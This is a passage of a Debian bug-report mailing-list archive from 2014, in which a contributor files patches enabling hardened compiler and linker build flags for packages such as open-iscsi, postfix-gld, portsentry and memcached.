XRvB2ArYqx5kJ+Vz5dUtgNnNL7gfvTuBZdPj7gfKtuNDXkS4/iVA+JV/vLoMQf0j
CxZbA1Ik3uwgH7C13QQH4Lbw9/cUmPHOC4rKX3bSKBoAJx/RyYJTed82dhUYRPRS
+/GA8o9FSkh4LAScoNM7dDpycJqDlGFYvXhgDersWh6MdhaHxUEItIbpWMB1lCSu
cq4A7sUG1Tu0OqG6y0T7CMB3diuOxTZPFd08LWCb5mvfS/7FE+9tWlvmUV6Rw3gu
H6tR4oNGBVMS/nC8Ow8OY2kl/2pk50IS/tQ2PQAFdXltGPI14PZTnHS2V4tEX8Ph
sySUGzdfhHl5+E74aqrMPREwVnQF1C5+2r5xjrepPQhIHdmXBDjaj0f1exCUrIPP
cZoN/RkycWxwGCA/10xl
=MOee
-END PGP SIGNATURE-
diff -Nru open-iscsi-2.0.873+git0.3b4b4500/debian/changelog open-iscsi-2.0.873+git0.3b4b4500/debian/changelog
--- open-iscsi-2.0.873+git0.3b4b4500/debian/changelog	2014-09-01 11:03:23.0 +0200
+++ open-iscsi-2.0.873+git0.3b4b4500/debian/changelog	2014-10-07 22:48:32.0 +0200
@@ -1,3 +1,11 @@
+open-iscsi (2.0.873+git0.3b4b4500-4.1) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Re-enable 03_hardened-build-flags.patch and refresh it to enable -dPIC
+to utils/open-isns lib.
+
+ -- Guillaume Delacour g...@iroqwa.org  Sun, 21 Sep 2014 12:06:00 +0200
+
 open-iscsi (2.0.873+git0.3b4b4500-4) unstable; urgency=medium
 
   * [41c7eca] Introduce new architectures based on current build
diff -Nru open-iscsi-2.0.873+git0.3b4b4500/debian/patches/03_hardened-build-flags.patch open-iscsi-2.0.873+git0.3b4b4500/debian/patches/03_hardened-build-flags.patch
--- open-iscsi-2.0.873+git0.3b4b4500/debian/patches/03_hardened-build-flags.patch	2014-08-20 15:53:55.0 +0200
+++ open-iscsi-2.0.873+git0.3b4b4500/debian/patches/03_hardened-build-flags.patch	2014-10-07 22:45:27.0 +0200
@@ -1,9 +1,9 @@
 hardened build flags - wheezy release goal
-Index: open-iscsi/usr/Makefile
+Index: open-iscsi-2.0.873+git0.3b4b4500/usr/Makefile
 ===
 open-iscsi.orig/usr/Makefile	2013-11-05 20:56:40.013418719 +0530
-+++ open-iscsi/usr/Makefile	2013-11-05 20:56:40.009418719 +0530
-@@ -28,7 +28,7 @@
+--- open-iscsi-2.0.873+git0.3b4b4500.orig/usr/Makefile
 open-iscsi-2.0.873+git0.3b4b4500/usr/Makefile
+@@ -28,7 +28,7 @@ IPC_OBJ=ioctl.o
  endif
  endif
  
@@ -12,7 +12,7 @@
  WARNFLAGS ?= -Wall -Wstrict-prototypes
  CFLAGS += $(OPTFLAGS) $(WARNFLAGS) -I../include -I. -I../utils/open-isns \
  -D$(OSNAME) $(IPC_CFLAGS)
-@@ -55,14 +55,14 @@
+@@ -55,14 +55,14 @@ all: $(PROGRAMS)
  
  iscsid: $(ISCSI_LIB_SRCS) $(INITIATOR_SRCS) $(DISCOVERY_SRCS) \
  	iscsid.o session_mgmt.o discoveryd.o
@@ -30,10 +30,10 @@
  clean:
  	rm -f *.o $(PROGRAMS) .depend $(LIBSYS)
  
-Index: open-iscsi/utils/Makefile
+Index: open-iscsi-2.0.873+git0.3b4b4500/utils/Makefile
 ===
 open-iscsi.orig/utils/Makefile	2013-11-05 20:56:40.013418719 +0530
-+++ open-iscsi/utils/Makefile	2013-11-05 20:56:40.009418719 +0530
+--- open-iscsi-2.0.873+git0.3b4b4500.orig/utils/Makefile
 open-iscsi-2.0.873+git0.3b4b4500/utils/Makefile
 @@ -1,12 +1,12 @@
  # This Makefile will work only with GNU make.
  
@@ -49,3 +49,16 @@
  
  clean:
  	rm -f *.o $(PROGRAMS) .depend
+Index: open-iscsi-2.0.873+git0.3b4b4500/utils/open-isns/Makefile.in
+===
+--- open-iscsi-2.0.873+git0.3b4b4500.orig/utils/open-isns/Makefile.in
 open-iscsi-2.0.873+git0.3b4b4500/utils/open-isns/Makefile.in
+@@ -13,7 +13,7 @@ VARDIR	= $(INSTALL_ROOT)$(vardir)
+ 
+ CC	= @CC@
+ CPPFLAGS= @CPPFLAGS@
+-CFLAGS	= @CFLAGS@ -I.
++CFLAGS	= @CFLAGS@ -I. -fPIC
+ LDFLAGS	= @LDFLAGS@
+ 
+ LIB	= libisns.a
diff -Nru open-iscsi-2.0.873+git0.3b4b4500/debian/patches/series open-iscsi-2.0.873+git0.3b4b4500/debian/patches/series
--- open-iscsi-2.0.873+git0.3b4b4500/debian/patches/series	2014-08-20 15:53:55.0 +0200
+++ open-iscsi-2.0.873+git0.3b4b4500/debian/patches/series	2014-10-07 21:42:37.0 +0200
@@ -1,4 +1,5 @@
 01_spelling-errors-and-manpage-hyphen-fixes.patch
 02_make-iscsistart-a-dynamic-binary.patch
+03_hardened-build-flags.patch
 04_fix_iscsi_path.patch
 05-disable-iscsiuio.patch
diff -Nru open-iscsi-2.0.873+git0.3b4b4500/debian/rules open-iscsi-2.0.873+git0.3b4b4500/debian/rules
--- open-iscsi-2.0.873+git0.3b4b4500

Bug#756906: nfs-utils: please use more hardening features

2014-10-04 Thread Guillaume Delacour 
Hello,

Applying the attached seems to be sufficient to enable hardened build
flags. Maybe interesting to enable PIE and BINDNOW too.
diff -Nru nfs-utils-1.2.8/debian/rules nfs-utils-1.2.8/debian/rules
--- nfs-utils-1.2.8/debian/rules	2014-08-13 02:12:43.0 +0200
+++ nfs-utils-1.2.8/debian/rules	2014-10-04 16:34:06.0 +0200
@@ -1,8 +1,11 @@
 #! /usr/bin/make -f
 
+DPKG_EXPORT_BUILDFLAGS = 1
+include /usr/share/dpkg/buildflags.mk
+
 # Parsing of DEB_BUILD_OPTIONS flags.
 # Note that nostrip is handled automatically by debhelper.
-CFLAGS := -g -Wall -DPIPEFS_DIR=\\\/run/rpc_pipefs\\\ \
+CFLAGS += -g -Wall -DPIPEFS_DIR=\\\/run/rpc_pipefs\\\ \
 		-DGSSD_PIPEFS_DIR=\\\/run/rpc_pipefs\\\
 
 ifneq (,$(filter noopt,$(DEB_BUILD_OPTIONS)))


signature.asc
Description: This is a digitally signed message part

Bug#763687: Please enable hardened build flags

2014-10-02 Thread Guillaume Delacour 
On Thu, Oct 02, 2014 at 10:14:16PM +0200, folkert wrote:
  Package: multitail
  Please enable hardening build flags on your package; adding:
  DPKG_EXPORT_BUILDFLAGS = 1
  include /usr/share/dpkg/buildflags.mk
 
 Are there any indications that multitail has security problems?

Not particular ones, but enabling *FLAGS (which contain security hardening
flags now) is a release goal and maybe good for future recompilation
archive compiler options. The priority is to enable flags to network
daemons, DSA, priority or important and interpreters packages and later
on the whole archive.

 
 
 Folkert van Heusden
 
 -- 
 You've probably gotten really fed up with never winning in the Mega-
 Millions lottery. Well, cry no longer: www.smartwinning.info tells you
 everything that might help you deciding what numbers to choose. With
 nice graphs and pretty animations!
 --

-- 
Guillaume Delacour


signature.asc
Description: Digital signature

Bug#763687: Please enable hardened build flags

2014-10-01 Thread Guillaume Delacour 
Package: multitail
Version: 6.2.1-1
Severity: important
User: hardening-disc...@lists.alioth.debian.org
Usertags: goal-hardening

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256



Hello,

Please enable hardening build flags on your package; adding:
DPKG_EXPORT_BUILDFLAGS = 1
include /usr/share/dpkg/buildflags.mk

In debian/rules is sufficient in the actual package state, or will be automatic
if you switch to debhelper version = 9. I've made some tests after building
multitail with hardened flags and encounter no problem at this time.

More information available about hardening flags:
https://wiki.debian.org/ReleaseGoals/SecurityHardeningBuildFlags

-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCAAGBQJULGMQAAoJEJmGUYuaqqClrVoP/i4vVIgQ94Fr2TqavsU/B3RX
fdiW7YCYxhF6JaYs3+9wXBk40zIzsym7aHsfTgDZI9lqtqWdGnqDz1UONaLiD0Fy
VHvI0r+kSTWZtCsDwmPxhbHgfGV5JW/a/75PcN73A03aTcRhuXHSz5ECe8EIDKam
/WXEHbu5BFg5F8wYJpxE16pCCfOf6DQF3vAjwNbF8n9Urx9HaJ1gLI+Sb6TdUEED
Kp7a1XUAypiQ9CfIYiaf29GHeze6a1yr4Wjk2xzObMM0jWses3voPdHd7EN+u2p9
Ljom1NKzM7bWeN2KpskIWuWU72t4iKB8VGwChToYQC25vxM2iMIHfVAtWTeAeB19
kSU5gjv8X9hlGF5XE9732LiXP6Q2LtlmcwhQUn0yuN04NyN6aw+YugBzgyRijHVu
ddgKRjyiDYg+OCu1IqHQwgfvo8eWhqdSvi/90RtaTJ397eQorgISH1wdSKUYGv6R
C0gO4YiuyFEWwgRCCncbN9tUy23nDSteUUS2gg4mFfH60vPvgNEXp6vkaalwvG6/
VjA4nucLF/AA5oY57SN+5ZaEldlDARuDJnTSDFS7b1dHKLxQoNgYNk4M4AcM9eUO
PwBVW0HsYpmOov1CcDxMa+OfX8rb5eDbK/3rHS8VrF9/Y9IFzZcNHow/XPVK1Ysv
rfU1KX6/286nOUsFdoCW
=jxnP
-END PGP SIGNATURE-


-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#763154: Hardening options incomplete: missings CPPFLAGS and LDFLAGS

2014-09-28 Thread Guillaume Delacour 
Package: postfix-gld
Version: 1.7-5
Severity: important
Tags: patch
User: hardening-disc...@lists.alioth.debian.org
Usertags: goal-hardening

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256


Hello,

As you previously enable CFLAGS, i've just refreshed your patch
debian/patches/01 to pass {CPP,LD}FLAGS to make in debian/rules and
updated upstream Makefile.in to use it.
I don't use postfix-gld so it maybe needs more intensive tests than i've
made.

-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCAAGBQJUJ9RMAAoJEJmGUYuaqqCli5MP/jYxSewDmzTb16KE1E8DMlaU
yr64sJbjBP8nJ2ub3Kj0f96n1rOQKu/5OvKQk6Fi62DrKypNDRzBObvq6iqyt+RA
xg8bcd62hWSeFwDkt5VHNWxqGyMXQ7ECfiR8X4XrlHWnqL+1iY18WfbpFce4ZPxP
jfZI62AsDaHQSYd0xZ/KuIwkgsBrtvhh7z4cEfINKSR1wT/0cAQjjvu1kLMZod2P
xRcbkiPhmkZjAWiX8lnLqqRk1cTRuQHIxZVdj15RXC5Wyml2W4kC9XgyIa6K/qfF
81/mABKeiISNV+xlY0VJe/ztv0HCiOepdfHhvrCZ/tOT/6hu2rPlKHf1MD1OM0yy
LtlkUOa0GEFNQJhtt225NVzPbARHBLCmgY2rT3ptY9yF0UbIlfxTujUwbmv0bmfD
loA4wHWmCG5GlURDdGQX6WLmyRngN26YgRdRYccRB7anpSYfxjyr0m/xyARO4KPU
0XJQbSbMvlhSJI0hFEJZ/RGYV5hMWcYs2WIwUbdytoiZZrJRu6obrbgc4gTfkEO/
Y9fPF2kqHqze+LO9sv14jjOeqSsQ7V8I4Toelln6czZ80oI8SIe+rz6y90B8hMZ8
ug4E5AEzQXrt1R4OyAnNaBYpt4o0OVwbSkMG9KuMlzTy/ZNnDqQKfVSzFaVENuIw
3ddbI+nFf1dlrAIq88Sa
=YEgw
-END PGP SIGNATURE-
diff -Nru postfix-gld-1.7/debian/changelog postfix-gld-1.7/debian/changelog
--- postfix-gld-1.7/debian/changelog	2014-03-16 16:53:11.0 +0100
+++ postfix-gld-1.7/debian/changelog	2014-09-28 11:13:08.0 +0200
@@ -1,3 +1,10 @@
+postfix-gld (1.7-5.1) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Refresh debian/patches/01 to pass CPPFLAGS and LDFLAGS to gcc calls
+
+ -- Guillaume Delacour g...@iroqwa.org  Sun, 28 Sep 2014 11:06:30 +0200
+
 postfix-gld (1.7-5) unstable; urgency=medium
 
   * Fixed typo in README.Debian.
diff -Nru postfix-gld-1.7/debian/patches/01 postfix-gld-1.7/debian/patches/01
--- postfix-gld-1.7/debian/patches/01	2010-04-19 00:09:12.0 +0200
+++ postfix-gld-1.7/debian/patches/01	2014-09-28 11:12:46.0 +0200
@@ -1,8 +1,11 @@
 From: Santiago Vila sanv...@debian.org
 Subject: Changed Makefile.in to support DEB_BUILD_OPTIONS
+Last-Update: 2014-09-28
 
 a/Makefile.in
-+++ b/Makefile.in
+Index: postfix-gld-1.7/Makefile.in
+===
+--- postfix-gld-1.7.orig/Makefile.in
 postfix-gld-1.7/Makefile.in
 @@ -1,23 +1,24 @@
  all: gld
  
@@ -11,27 +14,27 @@
  gld: cnf.o server.o sql.o sockets.o greylist.o gld.h
 -	@CC@ -O2 @DEFS@ -Wall server.o sql.o sockets.o cnf.o greylist.o @LIBS@ @SQL_LIBS@ -o gld
 -	strip gld
-+	@CC@ $(CFLAGS) @DEFS@ server.o sql.o sockets.o cnf.o greylist.o @LIBS@ @SQL_LIBS@ -o gld
++	@CC@ $(CFLAGS) $(CPPFLAGS) $(LDFLAGS) @DEFS@ server.o sql.o sockets.o cnf.o greylist.o @LIBS@ @SQL_LIBS@ -o gld
  
  sockets.o: sockets.c sockets.h
 -	@CC@ -O2 @DEFS@ -Wall -c sockets.c
-+	@CC@ $(CFLAGS) @DEFS@ -c sockets.c
++	@CC@ $(CFLAGS) $(CPPFLAGS) @DEFS@ -c sockets.c
  
  cnf.o: cnf.c gld.h
 -	@CC@ -O2 @DEFS@ -Wall -c cnf.c
-+	@CC@ $(CFLAGS) @DEFS@ -c cnf.c
++	@CC@ $(CFLAGS) $(CPPFLAGS) @DEFS@ -c cnf.c
  
  greylist.o: greylist.c gld.h
 -	@CC@ -O2 @DEFS@ -Wall -c greylist.c
-+	@CC@ $(CFLAGS) @DEFS@ -c greylist.c
++	@CC@ $(CFLAGS) $(CPPFLAGS) @DEFS@ -c greylist.c
  
  server.o: server.c gld.h
 -	@CC@ -O2 @DEFS@ -Wall -c server.c
-+	@CC@ $(CFLAGS) @DEFS@ -c server.c
++	@CC@ $(CFLAGS) $(CPPFLAGS) @DEFS@ -c server.c
  
  sql.o: sql.c
 -	@CC@ -O2 @DEFS@ @SQL_CFLAGS@ -Wall -c sql.c
-+	@CC@ $(CFLAGS) @DEFS@ @SQL_CFLAGS@ -c sql.c
++	@CC@ $(CFLAGS) $(CPPFLAGS) @DEFS@ @SQL_CFLAGS@ -c sql.c
  
  clean:
  	rm -f  gld *.o
diff -Nru postfix-gld-1.7/debian/rules postfix-gld-1.7/debian/rules
--- postfix-gld-1.7/debian/rules	2014-03-15 12:00:00.0 +0100
+++ postfix-gld-1.7/debian/rules	2014-09-28 11:15:49.0 +0200
@@ -16,7 +16,7 @@
 
 build:
 	./configure --prefix=/usr --with-$(DATABASE)
-	$(MAKE) CFLAGS=$(CFLAGS)
+	$(MAKE) CFLAGS=$(CFLAGS) CPPFLAGS=$(CPPFLAGS) LDFLAGS=$(LDFLAGS)
 	touch build
 
 clean:

Bug#763158: Hardening options incomplete: missings CPPFLAGS and LDFLAGS

2014-09-28 Thread Guillaume Delacour 
Package: portsentry
Version: 1.2-13
Severity: important
Tags: patch
User: hardening-disc...@lists.alioth.debian.org
Usertags: goal-hardening

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256



Hello,

Please enable CPPFLAGS and LDFLAGS from dpkg-buildflags (patch
attached). dpkg-buildflags handle noopt from DEB_BUILD_OPTIONS.

-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCAAGBQJUJ9jxAAoJEJmGUYuaqqClS5EP/3hTMdQakfzqXyjLlUMPOOSh
4hJ3McD9eJT7YMAPIdOfpCzmSuA6kMqYWNPkx2BTk2MAjoG6DGyGwliaTK6cS5aK
YEkm5mts4xYbBknOf6MS3nF4c4IVsic2JJiGX6NvbxjnVSm8g0HmRoh3oQHUKP03
Fj7keB4ko8yL1ZFomlZzF3R3aAbyV0BcX9k8mRvB9nMXdNp3EhQtiR43lOGi5Z6+
Et5DRB3MCURnEueS3+wg2jWBVweM/mF6BKas31y4EA9OORr0fJYPx1o8eDr9HNHZ
LLl1g0+AS/uPQI/EVIpueh8QLBUctMXwQXTkbS9nG/rz4abZrR6S5RekSlMYumrk
B60SqyHcLoyvM/g/xbrvmPaBOglyMkn/x/nPKF1Qe+JXKiHo3+dj1tt/JkAJ/Yoi
1dGZdsOzq9CCTnxh575kxgfcj08LDGia+ZgoB+bhNyXgdmaTS/SzNTU+KlOPN4pO
tpW7i1+UTBoZTQLnjX1HvGwnYZdg//7biXzkGLyC5D+KIHpTbjLhaPGiOczK1gXW
NNdOf+ZO9uQ/ZDgkXnOTAa740W6dfjbwC9CJ1jqpox8QJVdmV4tmCCucOVfeoVBW
AnzkMgViarPSD5rxqkT/XM/FGbBM8hFToq95DXWoKkEwiLdNpIQ/HqfWwUpa81CG
ykgGV3UAh/vSiIUSvFRW
=Pidp
-END PGP SIGNATURE-
diff -Nru portsentry-1.2/debian/changelog portsentry-1.2/debian/changelog
--- portsentry-1.2/debian/changelog	2012-01-14 15:28:24.0 +0100
+++ portsentry-1.2/debian/changelog	2014-09-28 11:34:24.0 +0200
@@ -1,3 +1,11 @@
+portsentry (1.2-13.1) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Use dpkg-buildflags and pass {CPP,LD}FLAGS to make and patch upstream
+Makefile to use them
+
+ -- Guillaume Delacour g...@iroqwa.org  Sun, 28 Sep 2014 11:29:22 +0200
+
 portsentry (1.2-13) unstable; urgency=low
 
   * Switch to dpkg-source 3.0 (quilt) format
diff -Nru portsentry-1.2/debian/patches/01_dpkg-buildflags.patch portsentry-1.2/debian/patches/01_dpkg-buildflags.patch
--- portsentry-1.2/debian/patches/01_dpkg-buildflags.patch	1970-01-01 01:00:00.0 +0100
+++ portsentry-1.2/debian/patches/01_dpkg-buildflags.patch	2014-09-28 11:40:10.0 +0200
@@ -0,0 +1,17 @@
+Author: Guillaume Delacour g...@iroqwa.org
+Description: Patch upstream Makefile to use {CPP,LD}FLAGS
+Last-Update: 2014-09-28
+
+Index: portsentry-1.2/Makefile
+===
+--- portsentry-1.2.orig/Makefile
 portsentry-1.2/Makefile
+@@ -107,7 +107,7 @@ linux:
+ debian-linux:		
+ 		SYSTYPE=debian-linux 
+ 		@echo Making $(SYSTYPE)
+-		$(CC) $(CFLAGS) -DLINUX -DDEBIAN -DSUPPORT_STEALTH -o ./portsentry ./portsentry.c \
++		$(CC) $(CFLAGS) $(CPPFLAGS) $(LDFLAGS) -DLINUX -DDEBIAN -DSUPPORT_STEALTH -o ./portsentry ./portsentry.c \
+ 		./portsentry_io.c ./portsentry_util.c $(LIBS)
+ 
+ 
diff -Nru portsentry-1.2/debian/patches/series portsentry-1.2/debian/patches/series
--- portsentry-1.2/debian/patches/series	2012-01-14 15:27:18.0 +0100
+++ portsentry-1.2/debian/patches/series	2014-09-28 11:33:41.0 +0200
@@ -2,3 +2,4 @@
 00_fix_portsentry.c.patch
 00_fix_README.install.patch
 00_fix_Makefile.patch
+01_dpkg-buildflags.patch
diff -Nru portsentry-1.2/debian/rules portsentry-1.2/debian/rules
--- portsentry-1.2/debian/rules	2012-01-14 15:27:18.0 +0100
+++ portsentry-1.2/debian/rules	2014-09-28 11:41:07.0 +0200
@@ -9,6 +9,9 @@
 # Uncomment this to turn on verbose mode.
 export DH_VERBOSE=1
 
+DPKG_EXPORT_BUILDFLAGS = 1
+include /usr/share/dpkg/buildflags.mk
+
 DEST=`pwd`/debian/`dh_listpackages`
 ETCDIR=$(DEST)/etc/portsentry
 PPP=$(DEST)/etc/ppp
@@ -17,13 +20,8 @@
 
 INSTALL=install
 INSTALL_PROGRAM = $(INSTALL) -p -o root -g root -m 755
-CFLAGS=-Wall -g
+CFLAGS+=-Wall
 
-ifneq (,$(findstring noopt,$(DEB_BUILD_OPTIONS)))
-CFLAGS += -O0
-else
-CFLAGS += -O2
-endif
 ifeq (,$(findstring nostrip,$(DEB_BUILD_OPTIONS)))
 INSTALL_PROGRAM += -s
 endif
@@ -42,7 +40,7 @@
 	dh_testdir
 
 	# Add here commands to compile the package.
-	$(MAKE) CFLAGS=$(CFLAGS) -f Makefile debian-linux 
+	$(MAKE) CFLAGS=$(CFLAGS) CPPFLAGS=$(CPPFLAGS) LDFLAGS=$(LDFLAGS) -f Makefile debian-linux 
 
 	touch build-stamp

Bug#763180: Hardening options incomplete: missing CFLAGS

2014-09-28 Thread Guillaume Delacour 
Package: ahcpd
Version: 0.53-2
Severity: normal
Tags: patch
User: hardening-disc...@lists.alioth.debian.org
Usertags: goal-hardening

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256



Hello,

The upstream Makefile overwrite CFLAGS variable exported by
dpkg-buildflags (which is -g -O2 -fstack-protector-strong -Wformat
- -Werror=format-security).
Please find attached a patch that fix that.

-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCAAGBQJUKAnCAAoJEJmGUYuaqqClbacP/2XWXL2wNUs8YSjakrORi9Vx
AZ4ChszXdK8bcAMrEv3E/AdKBmz4PlpPBNEeZkUvkPV3eO4Jst/YnxJEXbpJ7GnW
aaEFbZXGlORNkoTJxjBOKEjwxz1hELZ23vJGADBSdnkp4u2xoYtkyLrflwflTnMY
Cb2F1AM20HuTG6WYAVtgpRuzzVVPEgSwJGyzZREOeMx/wZJ+qeiZSqHaPhQ3SuGo
xGou0cWDgKdooem0ueWs4Q/ybk8q00dCqkj6TD86anUIqtiiLUiM+RRPNyIQwjM1
DL8ZCaNk4mbdcwHM0oWsPOdtUDH6kZoXdpBWHHN8zDqT7vrX7SoAilk8e5myz78M
21q0jJwd8iOx1S8t94jsdjvYbv8ZLovVKRn5r46+LGuDQ6gToMVv3qzmIExq2liD
9J3Kv6j2FSTROuZFck+PA5Fhyg3RhxA8LfiWLHHSKtRh3VEb56zolvbF0ji+Jsoa
4/w/4I+PsqpDCT6EgTtwro/J3DZW53AFj5WOoTNnye430is3ihtESdWLeavL+HSx
Foj2H82+yEK5j21NqJS8PUuPB0pKfOt8PgbHUYYZx1qmGkz4nGL+RyK4D1OOM3kx
nZHEJK+KhCmfvg0/zOEjCLjVuxMAgflYWAAlVA5Di92dXDIVAeiyPCRG+vHtbzFL
a2SM1L5B0ErJbTjTtvEv
=5do+
-END PGP SIGNATURE-
diff -Nru ahcpd-0.53/debian/changelog ahcpd-0.53/debian/changelog
--- ahcpd-0.53/debian/changelog	2013-05-26 21:11:53.0 +0200
+++ ahcpd-0.53/debian/changelog	2014-09-28 15:08:19.0 +0200
@@ -1,3 +1,10 @@
+ahcpd (0.53-2.1) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Patch upstream Makefile to not overwrite dpkg-buildflags CFLAGS
+
+ -- Guillaume Delacour g...@iroqwa.org  Sun, 28 Sep 2014 15:02:21 +0200
+
 ahcpd (0.53-2) unstable; urgency=low
 
   * Add logrotate support
diff -Nru ahcpd-0.53/debian/patches/01_dont_overwrite_cflags.diff ahcpd-0.53/debian/patches/01_dont_overwrite_cflags.diff
--- ahcpd-0.53/debian/patches/01_dont_overwrite_cflags.diff	1970-01-01 01:00:00.0 +0100
+++ ahcpd-0.53/debian/patches/01_dont_overwrite_cflags.diff	2014-09-28 15:05:30.0 +0200
@@ -0,0 +1,17 @@
+Author Guillaume Delacour g...@iroqwa.org
+Description: Don't overwrite dpkg-buildflags CFLAGS
+Last-Update: 2014-09-28
+
+Index: ahcpd-0.53/Makefile
+===
+--- ahcpd-0.53.orig/Makefile
 ahcpd-0.53/Makefile
+@@ -4,7 +4,7 @@ CDEBUGFLAGS = -Os -g -Wall
+ 
+ DEFINES = $(PLATFORM_DEFINES)
+ 
+-CFLAGS = $(CDEBUGFLAGS) $(DEFINES) $(EXTRA_DEFINES)
++CFLAGS += $(CDEBUGFLAGS) $(DEFINES) $(EXTRA_DEFINES)
+ 
+ SRCS = ahcpd.c monotonic.c transport.c prefix.c configure.c config.c lease.c
+ 
diff -Nru ahcpd-0.53/debian/patches/series ahcpd-0.53/debian/patches/series
--- ahcpd-0.53/debian/patches/series	1970-01-01 01:00:00.0 +0100
+++ ahcpd-0.53/debian/patches/series	2014-09-28 15:06:39.0 +0200
@@ -0,0 +1 @@
+01_dont_overwrite_cflags.diff

Bug#763183: Please enable hardened build flags

2014-09-28 Thread Guillaume Delacour 
Package: arp-scan
Version: 1.8.1-2
Severity: normal
Tags: patch
User: hardening-disc...@lists.alioth.debian.org
Usertags: goal-hardening



Hello,

Upstream already compile arp-scan with -fstack-protector,- D_FORTIFY_SOURCE=2 
and
-Wformat -Wformat-security gcc flags (but LDFLAGS relro is missing);
the use of dpkg-buildflags is recommended as it export all Debian hardening
*FLAGS automatically. You can just use it at the top of debian/rules:

DPKG_EXPORT_BUILDFLAGS = 1
include /usr/share/dpkg/buildflags.mk

Or switch to debhelper 9 to automatic enable this.


-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#763184: FTBFS with -Werror=format-security

2014-09-28 Thread Guillaume Delacour 
Source: cfengine3
Version: 3.2.4-2+nmu1
Severity: important
User: debian...@lists.debian.org
Usertags: hardening-format-security hardening

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Hello,

Cfengine fail to build with dpkg-buildflags hardened flags,
particularily with -Werror=format-security CFLAGS (build log attached).

The buildflags was not used in your package, i've just adding this to
debian/rules to see the failure:

DPKG_EXPORT_BUILDFLAGS = 1
include /usr/share/dpkg/buildflags.mk

-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCAAGBQJUKBKhAAoJEJmGUYuaqqCl6NsP/0cEdSHRoBdy3rxelo8rybOU
GCyu+ncbu3EmD06Vgr17iWeQIadvuT0rqsbWWfYxom1OmNjCs5S3Zj2WoMhZfa0E
WL3wsxFV+nFWWiM2a16ftwaoO7V4nskXMkgNhnFDC5FprO1XFvaWSgYSMOLK0XBt
xcnlXJTlUXcizEAi8Alz51Lal1oF9QZ5bl4j67e2a5iP3rZ/JL5daIt9Hz63rLsY
+A+VQLzE1MrvzEsN6gmW/evCfI/gQXCLs9p3Vy+HeE4Ahsr8VNszShQFaLE2Kb6I
4jj3aVneqtJ2ZixoVttEY3+2gd0Z+VG65TrDAAyBMnXycbXOb7GLYuRA3DzQj1na
McA2/zZeYwZdCVONNjJ3U9KiWAyMLywO4v1OZSm4J3gDfig4wmBK8JLO9rcouMYA
pBlt++BLkUVS7jECfX200AczqmyLUTolQqINcjAJ1iQVT7gccXufTDldgk7Jhuvd
46Ud+iYNZZrcWGqCFTLwPwreyYOSjpfZ0jM5Z95XoKOFobSvF2V1RPlDHbYzHXtH
AJU6lZrSH56hfKqPoLpG2YuRe9pHgAG/y7RXrS5SuyhEZZAvaekxDyjsBKiX4vUL
lDHaThxYPNJYGfsskzSnBFVJVoDSTsy2VD+ealW3r6moV9REpj0L0g3eCobO5mC9
0BsDuNBopnnq4u/v4GMA
=tgiA
-END PGP SIGNATURE-


-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#733588: memcached: Please update to new upstream version (1.4.20)

2014-09-25 Thread Guillaume Delacour 
Unless David emits objections, i've packaged [1] the new upstream and
fix all bugs in the PTS (and also fix build for arm64 port); i've had to
use debhelper 9 and dh_autoreconf to easily build this version without
repacking it and provide systemd script.

I've also fill the git collab-maint repository an alioth [2] (which was
created empty on january this year) with actual version on sid and the
version 1.4.20 and my debian related changes.

[1]:
http://mentors.debian.net/debian/pool/main/m/memcached/memcached_1.4.20-0.1.dsc
[2]: http://anonscm.debian.org/cgit/collab-maint/memcached.git/

-- 
Guillaume Delacour g...@iroqwa.org


signature.asc
Description: This is a digitally signed message part

Bug#733588: memcached: Please update to new upstream version (1.4.17)

2014-09-22 Thread Guillaume Delacour 
Hi,

As new upstream release 1.4.20 available, i've proposed my help to David
to provide a new upstream release and try to fix as many as possible BTS
bugs.

-- 
Guillaume Delacour g...@iroqwa.org


signature.asc
Description: This is a digitally signed message part

Bug#543626: memcached.log show event_add messages

2014-09-22 Thread Guillaume Delacour 
Hello,

This is apparently fixed since upstream release 1.4.6 (fix race crash
for accepting new connections). Sorry for the late answer.

-- 
Guillaume Delacour g...@iroqwa.org


signature.asc
Description: This is a digitally signed message part

Bug#762331: Hardening options incomplete (CPPFLAGS, LDFLAGS)

2014-09-21 Thread Guillaume Delacour 
Package: ifplugd
Version: 0.28-19
Severity: important
Tags: patch
User: hardening-disc...@lists.alioth.debian.org
Usertags: goal-hardening

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256



Hello,

Please enable CPPFLAGS and LDFLAGS from dpkg-buildflags (patch
attached). dpkg-buildflags handle noopt from DEB_BUILD_OPTIONS.

-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCAAGBQJUHotAAAoJEJmGUYuaqqClMqsP/18Wlil2RQmuffUGNh8onHno
Yb5y30UbZzco94KbhhrahfOT5FZ/fsQaX7GUkED68rf8WJOiFMH9kcTEP0k1d4o7
MJmrNzbiEIgOqFLKWX2pP/KnNsWh1SIj4FL04ELCh8bfwAoP+pEmmx6uxrIT2NUc
6PU/MdQIGQNA/FB+n5fGwD0wwjxeiQRAja7lmzP+Oqu9PLp3K4kByDFJOSLsnYJq
GdjkuAc8oh2O+gsE0sttxiGqpgJbrq9YB22XMEPlgbm4cvrmfb0SguXfYcN20WzC
0v/BrGRSzZkJlCat9qqSbaGOx8WpdU/9eeXLiLjPeCn3jwgSnAIwgKOXJZAj0HNk
